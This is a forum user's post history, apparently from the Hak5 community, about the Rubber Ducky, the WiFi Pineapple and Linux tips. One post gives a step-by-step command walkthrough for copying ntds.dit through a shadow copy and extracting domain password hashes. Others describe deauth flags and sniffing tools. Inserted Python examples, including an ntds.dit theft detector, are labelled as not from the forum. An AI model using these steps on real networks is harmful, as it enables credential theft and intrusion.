Everything posted by no42

  1. randomroll or urlsnarf are what I usually demo. Edit: randomroll will work on Android and iPhone (already tested :) ); can't remember sound working on the iPhone, but sound definitely worked on Android.
  2. Use it for penetration testing purposes with a signed contract. Try to use MAC white-listing to only permit connections from devices under assessment.
  3. Crazy problem. Sounds like he filled the POS terminal (Micros 3700) HDD with ISOs, movies and other downloads/torrents. He was then playing with VLAN security on a Cisco switch. Then he went to school? The POS terminal could no longer connect to a database server (card processing?), so they could no longer process credit/debit card payments in the restaurant; his boss/family wanted to shoot him? They fell back to a manual process of swiping cards and getting people to sign for the bills. When he returned from school, he went on the internet, realized his mistake, and corrected the problem. Hopefully he removed some crap or large log files from the HDD of the POS that may have caused the problem. The POS now works again, taking card payments; his boss/family are now happy again. Sidenote: I'm worried that he may have inadvertently installed malware on a POS - PCI DSS breach.... If I end up in his restaurant I'll remember to pay with cash!
  4. Done, on the v2 branch. Version 2.6 should be available for download in the usual place.
  5. Just verified the Duck Programming.zip (20.8MB) - it's fine. Downloads and extracts OK (used WinRAR to extract the contents). The file has been corrupted by Windows: you're getting \r at the end of lines, which Unix systems don't use. Use dos2unix to convert the file:
     apt-get install dos2unix
     then convert the file:
     dos2unix install_v1.0.9.sh
     It should then run fine. Not sure about the rest of the scripts, sorry, I haven't really used them or Kali.
  6. List available Java implementations:
     $ update-java-alternatives --list
     Use openjdk-6:
     $ update-java-alternatives --set java-6-openjdk
     Use the non-free Sun Java:
     $ update-java-alternatives --set java-6-sun
     Use the non-free Sun Java only for the web plugin:
     $ update-java-alternatives --plugin --set java-6-sun
  7. no42

    Teensy++

    use google to find version 1 posts: google: site:forums.hak5.org +version +1
  8. I'm sure I used opkg; from an ssh session type: opkg install dsniff
  9. There is the REPEAT X command; where X is an integer.
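As an added illustration of the REPEAT semantics named in that post (repeat the previous command n times), this is example code, not from the post or from Hak5's encoder: a small expander that resolves REPEAT into plain instruction lines so a script can be read line by line before encoding. How REM lines and consecutive REPEAT lines are treated is an assumption of this example.

```python
# Added example: resolve DuckyScript's REPEAT n into n extra copies of the
# previous instruction. Assumptions (not taken from the Hak5 encoder): REM
# lines are comments and are dropped; REPEAT applies to the last non-REM,
# non-REPEAT instruction, so consecutive REPEATs add up rather than multiply.

# Constructed sample script, not a real payload.
SAMPLE_SCRIPT = """REM constructed sample
DELAY 500
STRING hello
ENTER
REPEAT 2
"""


def expand_ducky(script: str) -> list[str]:
    """Return the script as a flat list of instructions with REPEAT expanded.

    Raises ValueError on a REPEAT with no preceding instruction or with a
    count that is not a non-negative integer.
    """
    out: list[str] = []
    last = None  # most recent instruction a REPEAT could refer to
    for lineno, raw in enumerate(script.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        parts = line.split(None, 1)
        keyword = parts[0].upper()
        if keyword == "REM":
            continue
        if keyword == "REPEAT":
            if last is None:
                raise ValueError(f"line {lineno}: REPEAT with no previous command")
            if len(parts) != 2 or not parts[1].isdigit():
                raise ValueError(f"line {lineno}: REPEAT needs an integer count")
            out.extend([last] * int(parts[1]))
            continue
        last = line
        out.append(line)
    return out


if __name__ == "__main__":
    for instr in expand_ducky(SAMPLE_SCRIPT):
        print(instr)
```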
  10. -a is the access point, -c should be the client. Looks like you're trying to deauth the AP with itself??? -c can either equal a client MAC aa:bb:cc:dd:ee:ff or equal the broadcast ff:ff:ff:ff:ff:ff to deauth all clients.
  11. There is/was a watchdog process... Any process that consumes too much memory/processor affects performance; a thread that cannot count for something like 5 secs will result in the watchdog process thinking the device is in a DoS, so it resets to recover. This appeared in the original Fon/Fonera, and possibly other devices? What are you running, how much of the processor is that process consuming? I could be wrong? Other hypotheses are welcome?
  12. I agree with Mr-Protocol. The guy openly states it's a cheap clone, and it's an alternative for students and people low on fund$. In the comments he openly encourages people to buy the original Pineapple if they can afford one. Also, it's a bit of a do-it-yourself job; you might make a mistake, have trouble getting it to work? I'd say most people are willing to pay for a plug n play device. Hak5 wins here!
  13. Ok, can you post a pic of device manager when your duck is installed.
  14. Step 1: Create Shadow Copy Drive (native command). Create the shadow copy of the drive CONTAINING the ntds.dit file (generally the C: drive, but it could be somewhere else if the file is big):
     vssadmin create shadow /for=[drive letter:]
     Step 2: List Drives (native command). Check the path to the Shadow Copy Volume, i.e. \\?\GLOBALROOT\Device\...
     vssadmin list shadows
     Step 3: Copy Files (native command). Copy the NTDS.dit and SYSTEM files out of the Volume(s):
     copy \\?\GLOBALROOT\Device\[...]\ntds.dit and \\?\GLOBALROOT\Device\[...]\SYSTEM to your machine
     Step 4: Crack the Hash. Get the libesedb libraries from: http://code.google.com/p/libesedb/downloads/list
     Extract and compile the libesedb libraries [./configure, make, make install, ldconfig]
     Get the NTDSXtract framework - http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
     After installing the libesedb libraries, extract the database tables from ntds.dit:
     esedbexport -l /tmp/esedbexport.log -t /tmp/ntds.dit <ntds.dit file>
     Extract the hashes/user info/password history:
     python dsusers.py /tmp/ntds.dit.export/datatable.3 /tmp/ntds.dit.export/link_table.4 --passwordhashes <SYSTEM file> --passwordhistory <SYSTEM file> --certificates --supplcreds <SYSTEM file> --membership > /tmp/ntds.dit.output
     Note: the link_table id could be link_table.4 or link_table.5 depending on the previous output.
     Convert the output to pwdump format:
     python ntdstopwdump.py /tmp/ntds.dit.output
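Seen from the defensive side, the sequence in that post (a shadow copy created, then ntds.dit or the SYSTEM hive copied out through the GLOBALROOT device path) is what a domain controller's process-creation audit trail should be watched for. As an added example, not from the post, the check below runs over constructed log records; the record fields and the 10-minute correlation window are assumptions of this example, not a real log schema.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation records (not real logs), loosely modelled on
# Windows Security event 4688 / Sysmon event 1, reduced to the fields used here.
SAMPLE_EVENTS = [
    {"time": "2013-05-01T10:00:01", "host": "DC01", "user": "CORP\\svc_backup",
     "cmdline": "vssadmin create shadow /for=C:"},
    {"time": "2013-05-01T10:00:09", "host": "DC01", "user": "CORP\\svc_backup",
     "cmdline": "vssadmin list shadows"},
    {"time": "2013-05-01T10:00:20", "host": "DC01", "user": "CORP\\svc_backup",
     "cmdline": r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3"
                r"\Windows\NTDS\ntds.dit C:\temp\ntds.dit"},
    {"time": "2013-05-01T10:00:25", "host": "DC01", "user": "CORP\\svc_backup",
     "cmdline": r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3"
                r"\Windows\System32\config\SYSTEM C:\temp\SYSTEM"},
    # Backup job on a file server, nothing copied out afterwards: no alert.
    {"time": "2013-05-01T11:00:00", "host": "FS01", "user": "CORP\\svc_backup",
     "cmdline": "vssadmin create shadow /for=D:"},
    # ntds.dit pulled from a pre-existing shadow copy, no create seen: still suspicious.
    {"time": "2013-05-01T12:30:00", "host": "WS07", "user": "CORP\\jdoe",
     "cmdline": r"xcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\ntds.dit D:\tmp"},
]

WINDOW = timedelta(minutes=10)  # assumed: how long after 'create shadow' a copy is correlated
CREATE_RE = re.compile(r"\bvssadmin(?:\.exe)?\s+create\s+shadow\b", re.I)
COPY_RE = re.compile(r"\b(?:copy|xcopy|robocopy)\b.*GLOBALROOT.*\\(ntds\.dit|SYSTEM)\b", re.I)

def detect_ntds_shadow_copy(events):
    """Alert on ntds.dit or the SYSTEM hive being copied through a GLOBALROOT
    shadow-copy device path. Severity is 'high' when the same host ran
    'vssadmin create shadow' within WINDOW beforehand, 'medium' otherwise."""
    alerts, last_create = [], {}  # last_create: host -> time of newest shadow creation
    for ev in sorted(events, key=lambda e: e["time"]):
        t, cmd = datetime.fromisoformat(ev["time"]), ev["cmdline"]
        if CREATE_RE.search(cmd):
            last_create[ev["host"]] = t
            continue
        m = COPY_RE.search(cmd)
        if not m:
            continue
        created = last_create.get(ev["host"])
        severity = "high" if created and t - created <= WINDOW else "medium"
        alerts.append({"time": ev["time"], "host": ev["host"], "user": ev["user"],
                       "file": m.group(1).lower(), "severity": severity})
    return alerts

if __name__ == "__main__":
    for a in detect_ntds_shadow_copy(SAMPLE_EVENTS):
        print(f"[{a['severity']}] {a['time']} {a['host']} {a['user']} copied {a['file']} from a shadow copy")
```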
  15. Look for Lorcon. Think it's actually included in Metasploit these days! (Though Metasploit does not appear to work on the pineapple), it may be possible to natively compile Lorcon.
  16. Looks similar to what's in the Hak Shop: http://hakshop.myshopify.com/collections/accessory/products/usb-battery-pack-3200mah Do you know the output current (Amps) before plugging it in? If it's similar to ones on the internet you might have 1x 2A & 1x 1A port? If it is similar to the Hak Shop one, all you need is http://hakshop.myshopify.com/collections/accessory/products/usb-power-cable to connect it to the Pineapple.
  17. If you're trying to perform it from a standard user's account, you need a privilege escalation bug/vuln/exploit in order to get the admin privileges needed to install the client.
  18. Differences are that it's all in C; I don't know of a specific API, so I guess the degree of programming difficulty is high, and development is slow. News: Heard from Darren, something is in the works! So hopefully in the next month something will happen, and we'll get an update on the forum / show. So hang tight for now.
  19. Other links:
     http://elasticsheep.com/2010/04/teensy2-usb-mass-storage-with-an-sd-card/
     http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle
     http://code.google.com/p/kautilya/
  20. What OSes are you using?
  21. It's a good start... As Python works in both Linux and Windows, can you get it to work in both? You should be able to detect the OS, then branch to either batchisp or dfu-programmer effectively. Keep up the good work.
  22. Version 1 was based on the Teensy, but it's incompatible with the latest version of DuckyScript. Version 1 Builds. Can you find some other interested people and club together so postage is shared? I forked out the initial $80USD + postage, probably why I was determined to get it working, despite all the early problems, as keymaps were not anticipated. It's been a handy tool that I don't want to part with.
  23. OK, now I need to know: firmware version of the duck, encoder version, your payload, your encoder command, any output from the encoder, your language.